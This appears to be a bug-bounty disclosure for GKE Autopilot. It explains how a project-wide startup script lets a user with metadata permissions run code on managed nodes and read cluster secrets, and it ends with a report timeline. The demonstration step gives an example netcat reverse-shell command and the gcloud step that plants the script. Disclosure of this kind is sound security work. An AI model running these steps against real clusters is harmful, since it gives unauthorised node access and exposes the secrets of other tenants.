Vulnerability Details

GKE Autopilot provides many default security controls to protect the node, including protections against privileged pods and limitations on hostPath volume mounts.

The Autopilot nodes do not have a startup-script defined in their instance metadata. As documented here, a user with compute.projects.setCommonInstanceMetadata can set a project-wide startup script. Since the nodes do not have this attribute set, they will use the project-wide attribute and allow arbitrary code execution from the startup-script. To demonstrate:

  1. Create a script with your desired code (e.g. nc -e /bin/sh 4444) and save as
  2. Set project-wide startup-script
gcloud compute project-info add-metadata --metadata-from-file
  1. Create an autopilot cluster and observe that the startup-script executes when the nodes boot.

Attack Scenario

The Autopilot documentation describes the motivation for its security controls as:

In order for GKE to offer management of the nodes and provide you with a more streamlined operational experience, there are a few restrictions and limitations when compared to GKE Standard. Some of these limitations are security best practices, while others allow Autopilot clusters to be safely managed.

A user with the compute.projects.setCommonInstanceMetadata permissions in the project could bypass the security controls in the cluster and gain privileged access to the managed Kubernetes nodes. Using this access, they could read all secrets in the cluster (including those outside their provisioned access) or explore the attack surface of the Autopilot control plane.


  • 2021-03-01: Initial report to Google VRP
  • 2021-03-01: Issue triaged
  • 2021-03-04: Internal bug report filed
  • 2021-03-05: Additional variants reported (vrp/181521559b, vrp/181521559c)
  • 2021-03-09: Internal bug report updated
  • 2021-04-01: Additional variant reported (vrp/181521559d)
  • 2021-04-06: Internal bug report updated
  • 2021-04-08: VRP issued reward ($1337 per variant)
  • 2021-06-07: Issue reported fixed
  • 2021-09-10: Retested and verified only variant “a” is fixed
  • 2021-09-11: Issue reopened